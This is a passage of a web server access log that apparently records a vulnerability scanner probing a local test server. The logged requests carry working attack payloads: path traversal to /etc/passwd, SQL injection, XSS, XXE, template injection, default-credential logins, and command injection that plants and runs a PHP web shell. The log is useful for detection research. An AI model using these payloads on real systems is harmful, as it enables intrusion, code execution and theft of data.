1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"--297MFiZ6QKkF2wUX8VgiLjuEQ5b\x0D\x0AContent-Disposition: form-data; name=\x22297MFlKMutJfpeoFGG11onvMFwU\x22; filename=\x22297MFjWhGBolswyT9pSWMnqbVTa.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--297MFiZ6QKkF2wUX8VgiLjuEQ5b\x0D\x0AContent-Disposition: form-data; name=\x22297MFmNOZsf3VcLmv09HG1Kv37f\x22; filename=\x22297MFgvSDn0NBbcjt3HXecnNb3U.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A ]>\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A &xxe;\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--297MFiZ6QKkF2wUX8VgiLjuEQ5b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /XMLCHART HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/v1/AccountService/Accounts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_up.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php 